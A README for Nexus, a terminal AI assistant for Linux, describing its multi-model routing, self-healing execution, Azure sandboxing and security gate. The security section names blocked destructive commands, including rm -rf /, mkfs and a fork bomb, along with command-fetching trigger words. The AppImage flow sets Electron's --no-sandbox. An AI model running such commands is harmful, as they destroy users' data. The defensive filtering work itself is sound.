An intelligent, terminal-based AI Linux assistant.

Nexus - AI-Powered Linux Assistant

Nexus is an intelligent, terminal-based Linux assistant that combines multiple AI models, memory systems, and automation capabilities to help you manage your system, browse the web, and execute complex tasks through natural language.

Key Features

Multi-Brain AI Architecture - Specialized models for different tasks
Autonomous Web Browsing - Automated tasks with browser-use
Persistent Memory - RAG via Supermemory (bring your own API key; snippets stay in your account — see Onboarding & Supermemory)
Self-Healing Execution - Auto-fix failed commands and auto-failover LLM routing
Resilient Command Generation - Retries transient API errors (429, timeouts) per provider, then falls back to alternate models; empty replies do not block the chain
Intelligent Intent Recognition - Context-aware decision making (including DIRECT_EXECUTE for simple one-shot shell tasks)
Security First - AST + regex gate before execution: strict rm -rf / heuristics, path allowlists for read / FILE_READ / home-scoped FILE_WRITE (subtree checks, not string prefixes), FTP credential / anonymous-FTP patterns blocked in strict mode, mandatory confirmation for risky/sudo commands
Ephemeral Azure Sandboxing - User-controlled cloud sandbox for running untrusted or risky commands safely
Runtime settings - /settings in the TUI to inspect models and keys, switch chat / router / browser models (same catalog as first-run onboarding), and update API keys with optional .env sync

Maturity snapshot (March 2026)

Nexus is best described as production-leaning for a power-user TUI: the execution stack (planner, executor, security gate, audit log, self-heal loop, LLM fallbacks) is well tested (198 automated pytest cases) and hardened from real failure modes (rate limits, bad JSON plans, sudo/interactive edge cases). Distribution ships without embedded API keys; users supply keys via onboarding or environment. Remaining risk is mostly product surface area: no automatic rollback checkpoints yet, FILE_WRITE always replaces whole files (no first-class append/patch action), and plans are still sequential. For AppImage + desktop integration, the planner encodes a full procedure (extract, icon, FILE_WRITE .desktop, update-desktop-database, Electron --no-sandbox); extraction of large images can take many minutes and is supported with an extended subprocess timeout.

Architecture Overview

Nexus follows a modular, multi-brain architecture where different AI models handle specialized tasks:

%%{init: {"themeVariables": {"fontFamily": "monospace"}}}%%
graph TB
    classDef default fill:#fff,stroke:#000,stroke-width:3px,color:#000,font-weight:bold;
    classDef highlight fill:#ffe600,stroke:#000,stroke-width:3px,color:#000,font-weight:bold;
    classDef secondary fill:#ff4949,stroke:#000,stroke-width:3px,color:#000,font-weight:bold;
    classDef tertiary fill:#49baff,stroke:#000,stroke-width:3px,color:#000,font-weight:bold;
    classDef purple fill:#c77ae8,stroke:#000,stroke-width:3px,color:#000,font-weight:bold;
    subgraph "User Interface Layer"
        TUI[Terminal UI<br/>Rich Console + Prompt Toolkit]
        CLI[CLI Commands<br/>Typer Framework]
    end

    subgraph "Intelligence Layer - Multi-Brain System"
        Router[Decision Engine<br/>Groq: Kimi K2]:::secondary
        Chat[Chat Brain<br/>OpenRouter: GPT / Groq: Kimi]:::tertiary
        Planner[Task Planner<br/>Primary LLM Client]:::tertiary
        CmdGen[Command Generator<br/>Primary LLM Client]:::tertiary
    end

    subgraph "Memory System"
        Memory[Supermemory<br/>RAG + Context Storage]:::highlight
    end

    subgraph "Execution Layer"
        Orchestrator[Orchestrator<br/>Multi-Step Task Execution]:::purple
        Executor[Command Executor<br/>Safety Checks + Confirmation]
        Browser[Browser Manager<br/>browser-use + API Key Rotation]:::purple
        Package[Package Manager<br/>apt/dnf/pacman]
    end

    subgraph "Core Services"
        Config[Config Manager<br/>~/.config/nexus]
        System[System Detector<br/>OS + Package Manager]
        Security[Security Module<br/>Command Validation]
    end

    TUI --> Router
    CLI --> Router
    Router --> Chat
    Router --> Planner
    Router --> CmdGen

    Chat --> Memory
    Planner --> Memory
    CmdGen --> Memory

    Planner --> Orchestrator
    CmdGen --> Executor

    Orchestrator --> Browser
    Orchestrator --> Executor

    Executor --> Security
    Browser --> Executor
    Package --> Executor

    Config --> System
    System --> Package

AI Model Usage Map

Nexus uses different AI models for different purposes, creating a specialized "multi-brain" system. Defaults below are the usual out-of-the-box choices; you can override chat, router, and browser models via Settings and default models (onboarding step 3 or /settings model).

| Component | Model Used | Purpose | Why This Model? |
| --- | --- | --- | --- |
| Router / Decision Engine | Groq: Kimi K2 (`moonshotai/kimi-k2-instruct-0905`) | Fast intent classification & routing | Ultra-fast inference (Groq), robust decision framework |
| Chat Brain | OpenRouter: GPT (default) or Groq: Kimi | Natural language conversations | Best reasoning & context understanding |
| Command Generator | Primary LLM Client | Convert natural language → shell commands | Strong code generation capabilities |
| Task Planner | Primary LLM Client | Break complex tasks into steps | Strategic thinking & planning with smart CHECK logic |
| Browser Agent | Gemini Flash (`gemini-flash-latest`) | Web automation & navigation | Vision support + fast inference for UI understanding |
| Search Tool | Gemini 2.5 Flash | Web search with citations | Native Google Search integration |

Model Priority & Auto-Failover System

Nexus implements a failover chain for critical components to maximize uptime: when a provider keeps returning a rate-limit error (e.g. a 429 from a free-tier model) after its per-provider retries, the request moves on to the next model in the chain.

%%{init: {"themeVariables": {"fontFamily": "monospace"}}}%%
graph LR
    classDef default fill:#fff,stroke:#000,stroke-width:3px,color:#000,font-weight:bold;
    classDef highlight fill:#ffe600,stroke:#000,stroke-width:3px,color:#000,font-weight:bold;
    classDef secondary fill:#ff4949,stroke:#000,stroke-width:3px,color:#000,font-weight:bold;
    classDef tertiary fill:#49baff,stroke:#000,stroke-width:3px,color:#000,font-weight:bold;
    classDef purple fill:#c77ae8,stroke:#000,stroke-width:3px,color:#000,font-weight:bold;
    subgraph "Decision/Router Brain"
        R1[Groq: Kimi K2]:::secondary --> R2[Fallback to Chat Brain]
    end

    subgraph "Chat & Planner Priority (Auto-Failover)"
        C1[OpenRouter: GPT]:::tertiary --> C2[Groq: Kimi] --> C3[Google: Gemini] --> C4[Mock Mode]
    end

    subgraph "Specialized Tasks"
        S1[Browser: Gemini Flash]:::purple
        S2[Video: Gemini 2.5 Flash]:::highlight
        S3[Search: Gemini 2.5 Flash]:::tertiary
    end

    R2 --> C1
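
The chain above can be sketched in a few lines of Python. This is a minimal illustration, not the project's code: `TransientError`, `generate_with_failover`, the retry count, and the final mock reply are all hypothetical names and values chosen for the example. Each client is modeled as a plain callable that takes a prompt and returns text.

```python
import time
from typing import Callable, Sequence


class TransientError(Exception):
    """Hypothetical stand-in for a retryable provider failure (HTTP 429, timeout)."""


def generate_with_failover(
    clients: Sequence[Callable[[str], str]],
    prompt: str,
    retries_per_client: int = 2,
    base_delay: float = 2.0,
    sleep: Callable[[float], None] = time.sleep,
) -> str:
    """Try each client in priority order, retrying transient errors with backoff."""
    for client in clients:
        for attempt in range(retries_per_client):
            try:
                reply = client(prompt)
            except TransientError:
                reply = ""  # retry the same client
            except Exception:
                break  # non-transient failure: move on to the next client
            if reply.strip():
                return reply
            # An empty reply is treated like a transient failure.
            if attempt < retries_per_client - 1:
                sleep(base_delay * (2 ** attempt))
    # Assumed last resort, standing in for "Mock Mode" in the diagram.
    return "[mock] no provider available"
```

Passing `sleep` as a parameter keeps the backoff testable without real delays.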

System Flow Diagrams

1. User Input Processing Flow

%%{init: {"themeVariables": {"fontFamily": "monospace", "actorBkg": "#fff", "actorBorder": "#333", "actorTextColor": "#333", "noteBkg": "#ffe600", "noteBorderColor": "#333", "noteTextColor": "#333", "activationBorderColor": "#333", "activationBkgColor": "#ff4949"}}}%%
sequenceDiagram
    participant User
    participant TUI
    participant DecisionEngine
    participant Router as Router Brain<br/>(Groq: Kimi)
    participant ChatBrain
    participant Orchestrator
    participant Executor

    User->>TUI: Input text
    TUI->>DecisionEngine: analyze(input)

    alt Fast Path: Heuristic Match
        DecisionEngine->>DecisionEngine: Regex patterns<br/>(install, remove, update)
        DecisionEngine-->>TUI: Intent(COMMAND)
    else Slow Path: AI Analysis
        DecisionEngine->>Router: Classify intent
        Router-->>DecisionEngine: JSON response
        DecisionEngine-->>TUI: Intent(COMMAND/CHAT/PLAN)
    end

    alt Action: COMMAND
        TUI->>Executor: Execute command
        Executor-->>User: Result
    else Action: CHAT
        TUI->>ChatBrain: generate_response()
        ChatBrain-->>User: Response
    else Action: PLAN
        TUI->>Orchestrator: execute_plan()
        Orchestrator-->>User: Multi-step execution
    end

2. Complex Task Orchestration Flow

%%{init: {"themeVariables": {"fontFamily": "monospace", "actorBkg": "#fff", "actorBorder": "#333", "actorTextColor": "#333", "noteBkg": "#ffe600", "noteBorderColor": "#333", "noteTextColor": "#333", "activationBorderColor": "#333", "activationBkgColor": "#ff4949"}}}%%
sequenceDiagram
    participant User
    participant Orchestrator
    participant Planner
    participant Memory
    participant Browser
    participant Executor

    User->>Orchestrator: "Install Postman"
    Orchestrator->>Planner: create_plan(request)

    Planner->>Memory: Query proven plans
    Memory-->>Planner: RAG context

    Planner->>Planner: Generate step-by-step plan
    Planner-->>Orchestrator: [CHECK, BROWSER, TERMINAL]

    loop For each step
        alt Step: CHECK
            Orchestrator->>Executor: which postman
            alt Already installed
                Executor-->>Orchestrator: Exit code 0
                Orchestrator-->>User: Already installed, skipping
            else Not found
                Executor-->>Orchestrator: Exit code 1
                Orchestrator->>Orchestrator: Continue to next step
            end
        else Step: BROWSER
            Orchestrator->>Browser: Download Postman
            Browser-->>Orchestrator: File path
        else Step: TERMINAL
            Orchestrator->>Executor: Install downloaded file
            Executor-->>Orchestrator: Success/Failure
        end

        alt Step failed
            Orchestrator->>Planner: reflect_and_fix(error)
            Planner-->>Orchestrator: Fixed command
            Orchestrator->>Executor: Retry
        end
    end

    Orchestrator->>Memory: Save successful plan
    Orchestrator-->>User: Task complete

3. Dual-Stage Self-Healing Execution Flow

Nexus employs a resilient two-stage self-healing system that attempts to recover failing commands up to 3 times before safely halting to prevent system corruption.

%%{init: {"themeVariables": {"fontFamily": "monospace", "actorBkg": "#fff", "actorBorder": "#333", "actorTextColor": "#333", "noteBkg": "#ffe600", "noteBorderColor": "#333", "noteTextColor": "#333", "activationBorderColor": "#333", "activationBkgColor": "#ff4949"}}}%%
sequenceDiagram
    participant Orchestrator
    participant Executor
    participant LocalHealer as Local Heuristic Matcher
    participant LLMHealer as LLM Self-Healer (Groq/OpenRouter)

    Orchestrator->>Executor: Execute step
    Executor-->>Orchestrator: Exit Code != 0 (Failed)

    %% Stage 1
    Orchestrator->>LocalHealer: Check for common errors (e.g. "command not found")
    alt Is "command not found"?
        LocalHealer-->>Orchestrator: Return fast auto-install command (e.g., apt install docker.io)
    else Complex Error
        %% Stage 2
        Orchestrator->>LLMHealer: reflect_and_fix(failed_command, error_output)
        Note over LLMHealer: Analyzes context as Senior DevOps

        alt Fixable Error
            LLMHealer-->>Orchestrator: Return raw, corrected bash command
        else Unfixable/Dangerous
            LLMHealer-->>Orchestrator: Return "UNFIXABLE"
        end
    end

    alt Got Fix
        Orchestrator->>Executor: Retry with corrected command (max 3 times)
        Executor-->>Orchestrator: Success or Failure
    else "UNFIXABLE" or Max Retries Hit
        Orchestrator->>Orchestrator: Halt execution safely to protect system state
    end
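
As a rough sketch of the two stages in the diagram, the loop below tries a local heuristic first and only then asks an LLM for a fix. The function names, the `apt` install prefix, and the choice to re-run the original command after installing a missing tool are assumptions made for this example; the real heuristics also map commands to package names (e.g. docker to docker.io), which is skipped here.

```python
import re
from typing import Callable, Optional, Tuple

MAX_HEAL_ATTEMPTS = 3  # the "up to 3 times" limit described above


def local_heal(stderr: str, install_prefix: str = "sudo apt install -y") -> Optional[str]:
    """Stage 1: cheap pattern match for 'command not found' errors."""
    match = re.search(r"([\w.+-]+): command not found", stderr)
    # Simplification: assume the package is named after the missing command.
    return f"{install_prefix} {match.group(1)}" if match else None


def run_with_healing(
    command: str,
    execute: Callable[[str], Tuple[int, str]],  # returns (returncode, stderr)
    llm_fix: Callable[[str, str], str],         # returns a command or "UNFIXABLE"
) -> bool:
    rc, stderr = execute(command)
    for _ in range(MAX_HEAL_ATTEMPTS):
        if rc == 0:
            break
        install = local_heal(stderr)
        if install is not None:
            execute(install)  # install the missing tool, then retry unchanged
        else:
            fix = llm_fix(command, stderr)  # Stage 2: LLM reflection
            if fix.strip() == "UNFIXABLE":
                return False  # halt instead of guessing
            command = fix
        rc, stderr = execute(command)
    return rc == 0
```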

3.5 Ephemeral Azure Sandboxing (`AZURE_RUN`)

Nexus includes an interactive, user-controlled cloud sandbox powered by Azure Container Instances. Instead of silently routing commands to the cloud, Nexus flags commands that could fetch or execute external code and gives you an explicit choice.

Trigger keywords: git clone, wget, curl, bash -c, sh -c, tar -x, make install, ./configure

What you see when a flagged command is about to run:

⚠️  Security Alert: This command fetches or compiles external code.
Command: git clone https://github.com/some-repo.git

Do you want to securely sandbox this in Azure instead of running it locally? (y/N):

Enter (No) → Runs directly on your local machine as normal. Use this for trusted repositories you work with every day.
y (Yes) → Nexus hot-swaps the action to AZURE_RUN:

%%{init: {"themeVariables": {"fontFamily": "monospace", "actorBkg": "#fff", "actorBorder": "#333", "actorTextColor": "#333", "noteBkg": "#ffe600", "noteBorderColor": "#333", "noteTextColor": "#333", "activationBorderColor": "#333", "activationBkgColor": "#ff4949"}}}%%
sequenceDiagram
    participant User
    participant Nexus
    participant Azure as Azure Container Instances

    Nexus->>User: Security Alert prompt (y/N)
    User->>Nexus: y (sandbox it)
    Nexus->>Azure: Create Ubuntu 22.04 container
    Azure-->>Nexus: Container provisioned
    Nexus->>Azure: apt-get install git curl wget build-essential python3 nodejs cmake...
    Nexus->>Azure: Run user command (base64 piped to bash, no nested eval quote bug)
    Azure-->>Nexus: Stream stdout/stderr logs in real time
    Nexus-->>User: Display output
    Nexus->>Azure: Delete container (permanent)
    Note over Azure: Container nuked. Your laptop untouched.

Implementation: Every sandboxed command (not only git — also curl, wget, bash -c, pipes, && chains, etc.) is UTF-8 base64-encoded inside the container command-line and piped through base64 -d | bash, so the full script runs verbatim. That avoids an older bug where eval + shlex.quote(cmd) sat inside a single-quoted bash -c '…' string — inner quotes terminated the outer literal early and could reduce a long command to the first token only (e.g. bare git). Obviously incomplete one-liners (empty, bare curl, bash -c with no script, …) are refused before a container is created.
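
The base64 wrapping described above can be illustrated as follows. `wrap_for_sandbox` and the small `BARE_FETCHERS` set are hypothetical names for this sketch; only the `base64 -d | bash` pipeline comes from the description. Because the payload contains only base64 characters, quotes inside the user's command can no longer terminate an outer shell literal.

```python
import base64
import shlex

# Assumed examples of "obviously incomplete" one-liners to refuse.
BARE_FETCHERS = {"curl", "wget"}


def wrap_for_sandbox(command: str) -> str:
    """Encode a command so it reaches bash verbatim inside the container."""
    if not command.strip():
        raise ValueError("refusing to sandbox an empty command")
    tokens = shlex.split(command)  # also raises ValueError on unbalanced quotes
    if len(tokens) == 1 and tokens[0] in BARE_FETCHERS:
        raise ValueError(f"refusing incomplete command: {command!r}")
    encoded = base64.b64encode(command.encode("utf-8")).decode("ascii")
    return f"echo {shlex.quote(encoded)} | base64 -d | bash"
```

A command mixing single and double quotes, such as `git clone 'https://example.com/some repo.git' && echo "it's done"`, survives the round trip unchanged when the payload is decoded.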

Design principle: Nexus does not decide if something is "sketchy" for you. It acts as a firewall checkpoint — you stay in control.

True Capacity: The DevOps & Sysadmin Engine

Nexus isn't just a chatbot: it drives standard one-liner sysadmin tools on your machine and, when you opt in, can run risky commands in an isolated Azure sandbox.

Docker Mastery: Ask Nexus to "keep docker tidy" or "kill all exited containers". It understands how to pipe docker ps -q to docker rm and uses pkill reliably.
Service Management (SERVICE_MGT): When interacting with systemd/services (e.g. "restart nginx"), Nexus executes the restart and then automatically runs systemctl status to confirm the service did not crash on startup, handing over to self-healing if the check fails.
Safe Failure: If self-healing a step fails 3 times, Nexus deliberately stops execution. It refuses to stumble blindly into the next step of a plan if the preceding requirements weren't met, preserving the integrity of your Linux system.

4. Memory System Integration

%%{init: {"themeVariables": {"fontFamily": "monospace"}}}%%
graph TB
    classDef default fill:#fff,stroke:#000,stroke-width:3px,color:#000,font-weight:bold;
    classDef highlight fill:#ffe600,stroke:#000,stroke-width:3px,color:#000,font-weight:bold;
    classDef secondary fill:#ff4949,stroke:#000,stroke-width:3px,color:#000,font-weight:bold;
    classDef tertiary fill:#49baff,stroke:#000,stroke-width:3px,color:#000,font-weight:bold;
    classDef purple fill:#c77ae8,stroke:#000,stroke-width:3px,color:#000,font-weight:bold;
    subgraph "Input Sources"
        UserReq[User Requests]
        CmdResult[Command Results]
        Plans[Successful Plans]
        SysInfo[System Context]
    end

    subgraph "Supermemory Storage"
        Memory[(Supermemory<br/>Vector Database)]:::highlight
    end

    subgraph "RAG Retrieval"
        Query[Query Memory]:::highlight
        Context[Enrich Prompts]:::highlight
    end

    subgraph "AI Components"
        Chat[Chat Brain]
        CmdGen[Command Generator]
        Planner[Task Planner]
    end

    UserReq --> Memory
    CmdResult --> Memory
    Plans --> Memory
    SysInfo --> Memory

    Chat --> Query
    CmdGen --> Query
    Planner --> Query

    Query --> Memory
    Memory --> Context
    Context --> Chat
    Context --> CmdGen
    Context --> Planner

Component Details

AI Clients (`src/jarvis/ai/`)

`llm_client.py` - LLM Abstraction Layer

LLMClient (Abstract Base): Memory integration, prompt enrichment
GoogleGenAIClient: Gemini models with Google Search grounding
OpenRouterClient: Access to GPT models via OpenRouter
GroqClient: Ultra-fast inference for routing decisions
MockLLMClient: Fallback when no API keys configured

`command_generator.py` - Natural Language → Shell Commands

Converts user requests to executable shell commands
Uses RAG to retrieve proven solutions from memory (queries use the primary client’s memory; successful generations are recorded on whichever LLM client actually produced the command, including fallbacks)
Retries transient provider failures on the same model (with backoff), then tries fallback clients; treats empty model output as retryable
Implements safety guidelines and idempotency principles (SafetyCheck before return)

`decision_engine.py` - Intent Classification

Fast Path: Regex-based heuristics for common commands
Slow Path: LLM-based intent analysis with robust examples
Routes to: COMMAND, CHAT, PLAN, SEARCH, BROWSE
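
A minimal sketch of the fast path / slow path split, assuming the router LLM is a callable that returns an intent name. The regexes, the `classify` function, and the fallback to CHAT for unrecognized answers are illustrative choices, not the project's actual rules.

```python
import re
from typing import Callable

VALID_INTENTS = {"COMMAND", "CHAT", "PLAN", "SEARCH", "BROWSE"}

# Hypothetical fast-path patterns for common package operations.
FAST_PATTERNS = [
    re.compile(r"^(install|remove|uninstall)\s+\S+", re.IGNORECASE),
    re.compile(r"^update$", re.IGNORECASE),
]


def classify(text: str, router_llm: Callable[[str], str]) -> str:
    cleaned = text.strip()
    # Fast path: no LLM call when a heuristic matches.
    if any(pattern.match(cleaned) for pattern in FAST_PATTERNS):
        return "COMMAND"
    # Slow path: ask the router model, then validate its answer.
    answer = router_llm(cleaned).strip().upper()
    return answer if answer in VALID_INTENTS else "CHAT"  # assumed default
```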

`memory_client.py` - Supermemory Integration

BYOK: Each user sets SUPERMEMORY_API_KEY (env) or saves a key during onboarding — memories are stored in that user’s Supermemory project, not a shared vendor key inside the package.
Stores (plain text to the API): system context snippets, command feedback, task logs, planner-related context — see Onboarding & Supermemory.
Retrieves: Relevant context for RAG-enhanced prompts
Enables learning from past successes/failures

Core Systems (`src/jarvis/core/`)

`orchestrator.py` - Multi-Step Task Execution

Planner: Breaks complex requests into steps (CHECK → BROWSER → TERMINAL → FILE_WRITE / FILE_READ / FILE_SEARCH / …)
Smart Resume: Checks if files already exist before downloading
Self-Healing: Auto-fixes failed commands using LLM reflection plus fast local heuristics (e.g. wrong package manager for .deb/.AppImage, mkdir -p when stderr shows missing paths — uses pathlib + shlex.quote, not fragile string splits)
FILE_WRITE: Writes full file contents (overwrite). Paths under your home directory use Python write_text (no sudo); system paths use sudo mkdir -p + sudo tee. Userland vs sudo paths share _file_write_via_userland / _file_write_via_sudo_tee so the main executor and the self-heal retry stay consistent. Failed writes retry once with mkdir / sudo (see self-heal block). There is no FILE_APPEND yet — to append (e.g. a line in ~/.zshrc), the planner typically uses a TERMINAL step (echo '…' >> ~/.zshrc) which is subject to normal shell safety checks and confirmation.
AppImage / desktop flow (planner-guided): chmod + copy to ~/.local/bin, --appimage-extract inside mktemp -d /tmp/nexus-appimg.XXXXXX (avoids squashfs-root collisions across concurrent plans), copy icon, FILE_WRITE a fresh ~/.local/share/applications/*.desktop (not the squashfs copy — wrong Exec/Icon), update-desktop-database, and for Electron/Chromium bundles --no-sandbox on Exec=. Residual gap: icons remain best effort from a shallow find.
Live UI: Real-time progress tracking with Rich tables
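
To illustrate the FILE_WRITE split between home paths and system paths, here is a simplified sketch. `file_write` and its return labels are hypothetical; the sudo branch only reports which route would be taken rather than shelling out to `sudo mkdir -p` and `sudo tee`.

```python
from pathlib import Path
from typing import Optional


def file_write(target: str, content: str, home: Optional[Path] = None) -> str:
    """Overwrite `target` with `content`; return which route was used."""
    home_root = (home or Path.home()).resolve()
    path = Path(target).expanduser().resolve()
    if not path.is_relative_to(home_root):  # Python 3.9+
        # System path: the real flow would use sudo mkdir -p + sudo tee here.
        return "sudo-tee"
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_text(content)  # whole-file overwrite, no append
    return "userland"
```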

`executor.py` & `security.py` — Safe Command Execution

AST-Based Command Validation: Deep analysis of shell syntax to catch obfuscated attacks (e.g. eval, cd / && rm -rf *).
Strict blacklist filtering (blocks rm -rf /, mkfs, fork bombs :(){ :|:& };:).
rm -rf / heuristics use horizontal-whitespace-aware patterns so /tmp/…, /var/tmp/…, and wrapped lines are not false positives.
Path allowlist (SafetyCheck.is_path_within_any_root): CLI read, orchestrator FILE_READ, and home-scoped FILE_WRITE require resolved paths to lie under home and/or cwd using Path.relative_to, avoiding /home/user2/… false “under /home/user” bugs from naive str.startswith.
FTP (strict mode): Commands embedding passwords in ftp://user:pass@…, wget --ftp-password=…, lftp -u user,pass, or common anonymous FTP forms are rejected (same strict path as other dangerous-pattern warnings). Normal docker, psql, postgresql://… URLs are unaffected.
User confirmation mandatory for dangerous or sudo operations.
Scoped shell=True: Only activates when genuine pipeline operators (&&, |, ;, >) are detected — prevents injection when the command is a simple binary call.
Zeroized sudo password: Stored as bytearray in memory and byte-by-byte zeroed on auth failure — never held as a Python str that GC might retain.
Persistent Audit Log (~/.nexus/audit.log, chmod 600): Every executed, skipped, or rejected command is logged with timestamp, return code, user-confirmed Y/N, and stdout/stderr excerpts.
Dry-run mode support.
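
The subtree check behind the path allowlist can be sketched like this. The function below borrows the name `is_path_within_any_root` from the description, but its signature and body are a guess at the technique (resolve, then `Path.relative_to`), not the project's implementation.

```python
from pathlib import Path
from typing import Iterable, Union

PathLike = Union[str, Path]


def is_path_within_any_root(candidate: PathLike, roots: Iterable[PathLike]) -> bool:
    """True if `candidate` resolves to a location inside one of `roots`."""
    resolved = Path(candidate).resolve()  # collapses ".." and symlinks
    for root in roots:
        try:
            resolved.relative_to(Path(root).resolve())
            return True
        except ValueError:
            continue  # not under this root; try the next one
    return False
```

With a naive `str.startswith` test, `/home/user2/notes.txt` would pass for the root `/home/user`; the component-wise comparison rejects it.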

`config_manager.py` - Configuration Management

Stores API keys, preferences in ~/.config/nexus/config.json (file mode 0o600 on save)
Environment variable overrides (on load) for keys such as OPENROUTER_API_KEY, GOOGLE_API_KEY, etc.
Onboarding state tracking
Optional default models (written by onboarding step 3 or /settings): chat_model, router_model, browser_model — see Settings and default models
update() persists to config.json and, when a project .env file exists, syncs known API key fields to matching env vars (same mapping as onboarding/settings key flows)
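
A small sketch of the save/load behavior listed above: owner-only file mode on save, and environment variables overriding stored keys on load. The field names in `ENV_OVERRIDES` and both function names are assumptions for illustration; only the environment variable names and the `0o600` mode come from the description.

```python
import json
import os
from pathlib import Path
from typing import Mapping

# Hypothetical config-field to env-var mapping.
ENV_OVERRIDES = {
    "openrouter_api_key": "OPENROUTER_API_KEY",
    "google_api_key": "GOOGLE_API_KEY",
}


def save_config(path: Path, data: dict) -> None:
    path.parent.mkdir(parents=True, exist_ok=True)
    # Create the file with 0o600 from the start rather than chmod-ing later.
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as handle:
        json.dump(data, handle, indent=2)
    os.chmod(path, 0o600)  # tighten the mode if the file already existed


def load_config(path: Path, environ: Mapping[str, str] = os.environ) -> dict:
    data = json.loads(path.read_text()) if path.exists() else {}
    for field, variable in ENV_OVERRIDES.items():
        if environ.get(variable):
            data[field] = environ[variable]  # environment wins on load
    return data
```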

`system_detector.py` - OS Detection

Detects: Ubuntu, Debian, Fedora, Arch, etc.
Identifies package manager: apt, dnf, pacman
Provides system context to AI models
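
One common way to do this kind of detection is to read the `ID` and `ID_LIKE` fields of `/etc/os-release`. The sketch below assumes that approach; the README does not say how `system_detector.py` actually works, and the function names and mapping table are illustrative.

```python
from typing import Dict, Optional

PACKAGE_MANAGERS = {
    "ubuntu": "apt",
    "debian": "apt",
    "fedora": "dnf",
    "arch": "pacman",
}


def parse_os_release(text: str) -> Dict[str, str]:
    """Parse KEY=value lines, dropping comments and surrounding quotes."""
    fields = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        fields[key] = value.strip().strip('"').strip("'")
    return fields


def detect_package_manager(os_release_text: str) -> Optional[str]:
    fields = parse_os_release(os_release_text)
    # Derivatives (e.g. Linux Mint) name their parents in ID_LIKE.
    candidates = [fields.get("ID", "")] + fields.get("ID_LIKE", "").split()
    for distro in candidates:
        manager = PACKAGE_MANAGERS.get(distro.lower())
        if manager:
            return manager
    return None
```

On a real system the text would come from `Path("/etc/os-release").read_text()`.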

Modules (`src/jarvis/modules/`)

`browser_manager.py` - Web Automation

Local Mode: browser-use library with Playwright (headless=false for live view)
Cloud Mode: BrowserUse SDK for headless execution
Smart download handling (~/Downloads tracking)
LLM: Gemini (default gemini-2.5-flash) or OpenRouter (openai/gpt-oss-120b:free) depending on keys; optional browser_model from config when it matches the active provider (see Settings and default models)

`package_manager.py` - System Package Management

Unified interface for apt/dnf/pacman
Install, remove, update operations
Automatic sudo handling

UI Layer (`src/jarvis/ui/`)

`console_app.py` — Terminal User Interface

Rich Console: Panels, tables, markdown rendering
Prompt Toolkit: Async input with syntax highlighting
Persistent Session (~/.nexus/session.json): Context-aware responses that survive restarts; last 24h of history restored on launch
Command Handlers: /browse, /search, /find, /read, /do, package commands, /settings (show, help, model, key), /status, /think, etc.

`model_catalog.py` — Shared task ↔ model catalog

Single source of truth for which model IDs are valid per task (chat, router, browser) and which Nexus config key unlocks each provider
Used by onboarding (default model picks), /settings model, and startup when applying saved chat_model / router_model

`onboarding.py` - First-Run Setup

Collects API keys (Google, OpenRouter, Groq, optional Anthropic)
Optional Supermemory enablement (BYOK)
Step 3 — Default models: numbered menus built from the same catalog as /settings model (per task, only for providers you configured in step 1); choosing “built-in default” leaves the corresponding *_model field unset
Saves to ~/.config/nexus/config.json (no keys are bundled with the app)

Onboarding & Supermemory (BYOK)

First-run setup explains that Nexus Memory is optional and uses your Supermemory project:

If SUPERMEMORY_API_KEY is already set (or a key exists in saved config), onboarding reports it and asks whether to enable RAG (default: on).
If not set, memory defaults off; users can opt in and paste their own key (stored locally next to other keys).
Shipping: Release artifacts should not embed a shared Supermemory or LLM key — users supply fuel (keys) after install.

Installation

Install from PyPI (recommended)

The distribution on PyPI is nexus-linux-assistant (the name nexus is already used by another package). The CLI command is still nexus.

pip install "nexus-linux-assistant[all]"
playwright install chromium   # needed for /browse
nexus                           # first run: onboarding + BYOK keys → ~/.config/nexus/

Optional isolated install: pipx install "nexus-linux-assistant[all]", then make sure the Playwright browsers are installed for that environment (playwright install chromium).

Install from a GitHub Release tarball

Replace VERSION with the tag (for example 0.1.0 for tag v0.1.0). Artifact names use underscores (nexus_linux_assistant).

VERSION=0.1.0
curl -LO "https://github.com/Garvit1000/nexus/releases/download/v${VERSION}/nexus_linux_assistant-${VERSION}.tar.gz"
pip install "nexus_linux_assistant-${VERSION}.tar.gz[all]"
playwright install chromium
nexus

No .env is included in the package; use onboarding or /settings key, or create your own .env if you want env-based config.

Prerequisites

Python 3.10 or higher
Supported OS: Ubuntu, Debian, Fedora, Arch Linux

Setup

Clone the repository:

   git clone <repository-url>
   cd nexus

Create virtual environment:

   python3 -m venv .venv
   source .venv/bin/activate

Install package with all dependencies:

   pip install -e ".[all]"

What [all] installs: Core TUI + AI providers (Google Gemini, OpenAI, LangChain) + browser automation (Playwright). This is what you need for full functionality.

Optional extras (for specific use cases):

pip install -e ".[ai]"      # Core + AI providers only (no browser)
pip install -e ".[browser]" # Core + browser automation only
pip install -e ".[dev]"     # Core + pytest (for running tests, no AI/browser)
pip install -e "."          # Core only (TUI shell, no AI or browser)

Install Playwright browsers (required for web automation):

   playwright install chromium

Configure API keys (all BYOK — nothing is embedded in the package):

   cp .env.example .env
   # Edit .env and add your API keys

Or rely on SUPERMEMORY_API_KEY, OPENROUTER_API_KEY, etc. in the environment.

Run onboarding (first-time only):

   nexus

Global Access

Add to ~/.bashrc or ~/.zshrc:

alias nexus='/path/to/nexus/.venv/bin/nexus'

Usage

Interactive Mode (TUI)

nexus

Launches the full Terminal UI with decision engine, memory, and all features.

Settings and default models

Nexus keeps one catalog of allowed models per task (src/jarvis/core/model_catalog.py). Onboarding step 3 and the TUI command /settings model both draw from it, so first-run choices stay consistent with what you can change later in the app.

| Mechanism | What it does |
| --- | --- |
| `/settings` | Summary panel: active models (chat, router, browser, search), fallbacks, memory, executor mode, route-cache stats when available |
| `/settings help` | Subcommands, examples, and provider aliases |
| `/settings model` | Interactive picker (arrow keys) or direct form: `/settings model chat <model_id>`. May switch which provider instance is primary when the model belongs to another client in the failover chain |
| `/settings key` | Update a key: interactive list from `.env` keys (if present) or `provider value`. Updates `config.json`, syncs mapped vars to `.env` when the file exists, and refreshes in-memory SDK clients where supported |

Persisted fields in ~/.config/nexus/config.json:

chat_model, router_model, browser_model — optional strings; unset means “use each client’s built-in default”
On startup, main.py applies chat_model / router_model via the same rules as /settings model. Browser uses browser_model only when it matches the active browser provider (Google vs OpenRouter); otherwise the safe default for that SDK is used.

Edge cases (by design):

Unknown model IDs in config (typos or manual edits) are ignored at startup so the wrong provider is not given another provider’s model string.
